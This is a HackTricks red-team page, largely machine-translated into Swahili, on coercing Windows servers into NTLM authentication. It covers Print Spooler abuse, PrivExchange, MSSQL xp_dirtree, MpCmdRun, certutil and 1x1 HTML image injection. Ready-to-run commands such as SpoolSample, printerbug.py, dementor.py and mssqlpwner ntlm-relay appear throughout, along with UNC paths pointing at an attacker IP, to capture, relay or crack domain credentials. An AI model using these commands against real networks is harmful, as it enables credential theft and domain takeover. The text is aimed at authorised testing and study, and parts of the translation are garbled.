Force NTLM Privileged Authentication

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

SharpSystemTriggers

SharpSystemTriggers ni mkusanyiko wa vichocheo vya uthibitishaji wa mbali vilivyotengenezwa kwa C# kwa kutumia MIDL compiler ili kuepuka utegemezi wa wahusika wengine.

Spooler Service Abuse

Ikiwa huduma ya Print Spooler ime wezeshwa, unaweza kutumia baadhi ya akidi za AD zilizojulikana ili kuomba kwa seva ya uchapishaji ya Domain Controller sasisho kuhusu kazi mpya za uchapishaji na umwambie tu atumie arifa kwa mfumo fulani. Kumbuka wakati printer inatuma arifa kwa mifumo isiyo ya kawaida, inahitaji kujiandikisha dhidi ya mfumo huo. Hivyo, mshambuliaji anaweza kufanya huduma ya Print Spooler kujiandikisha dhidi ya mfumo wowote, na huduma hiyo itatumia akaunti ya kompyuta katika uthibitishaji huu.

Finding Windows Servers on the domain

Kwa kutumia PowerShell, pata orodha ya masanduku ya Windows. Seva mara nyingi ni kipaumbele, hivyo hebu tuzingatie hapo:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Kutafuta huduma za Spooler zinazot listening

Kwa kutumia @mysmartlogin's (Vincent Le Toux's) SpoolerScanner iliyobadilishwa kidogo, angalia kama Huduma ya Spooler inasikiliza:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Unaweza pia kutumia rpcdump.py kwenye Linux na kutafuta Protokali ya MS-RPRN

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Omba huduma ithibitishe dhidi ya mwenyeji yeyote

Unaweza kukusanya SpoolSample kutoka hapa.

SpoolSample.exe <TARGET> <RESPONDERIP>

au tumia 3xocyte's dementor.py au printerbug.py ikiwa uko kwenye Linux

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

Kuunganisha na Delegation Isiyo na Kikomo

Ikiwa mshambuliaji tayari ameathiri kompyuta yenye Unconstrained Delegation, mshambuliaji anaweza kufanya printer ithibitishe dhidi ya kompyuta hii. Kwa sababu ya delegation isiyo na kikomo, TGT ya akaunti ya kompyuta ya printer itakuwa imehifadhiwa katika kumbukumbu ya kompyuta yenye delegation isiyo na kikomo. Kwa kuwa mshambuliaji tayari ameathiri mwenyeji huyu, ataweza kurejesha tiketi hii na kuifanya itumike (Pass the Ticket).

RCP Kulazimisha uthibitisho

GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.GitHub

PrivExchange

Shambulio la PrivExchange ni matokeo ya kasoro iliyopatikana katika kipengele cha PushSubscription cha Exchange Server. Kipengele hiki kinaruhusu server ya Exchange kulazimishwa na mtumiaji yeyote wa kikoa mwenye sanduku la barua kuthibitisha kwa mwenyeji yeyote aliyepewa na mteja kupitia HTTP.

Kwa kawaida, huduma ya Exchange inafanya kazi kama SYSTEM na inapewa mamlaka kupita kiasi (hasa, ina WriteDacl privileges kwenye kikoa kabla ya Sasisho la Jumla la 2019). Kasoro hii inaweza kutumika kuruhusu kuhamasisha taarifa kwa LDAP na kisha kutoa hifadhidata ya NTDS ya kikoa. Katika hali ambapo kuhamasisha kwa LDAP haiwezekani, kasoro hii bado inaweza kutumika kuhamasisha na kuthibitisha kwa wenyeji wengine ndani ya kikoa. Ufanisi wa shambulio hili unatoa ufikiaji wa haraka kwa Msimamizi wa Kikoa kwa akaunti yoyote ya mtumiaji wa kikoa iliyoidhinishwa.

Ndani ya Windows

Ikiwa tayari uko ndani ya mashine ya Windows unaweza kulazimisha Windows kuungana na seva kwa kutumia akaunti zenye mamlaka na:

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Au tumia mbinu hii nyingine: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

Inawezekana kutumia certutil.exe lolbin (binary iliyosainiwa na Microsoft) kulazimisha uthibitishaji wa NTLM:

certutil.exe -syncwithWU  \\127.0.0.1\share

HTML injection

Via email

If you know the email address of the user that logs inside a machine you want to compromise, you could just send him an email with a 1x1 image such as

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

na wakati anafungua, atajaribu kuthibitisha.

MitM

Ikiwa unaweza kufanya shambulio la MitM kwa kompyuta na kuingiza HTML kwenye ukurasa atakaouona unaweza kujaribu kuingiza picha kama ifuatavyo kwenye ukurasa:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Cracking NTLMv1

Ikiwa unaweza kukamata NTLMv1 challenges soma hapa jinsi ya kuzivunja. &#xNAN;Rumbuka kwamba ili kuvunja NTLMv1 unahitaji kuweka changamoto ya Responder kuwa "1122334455667788"

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousPrintNightmare NextPrivileged Groups

Last updated 6 days ago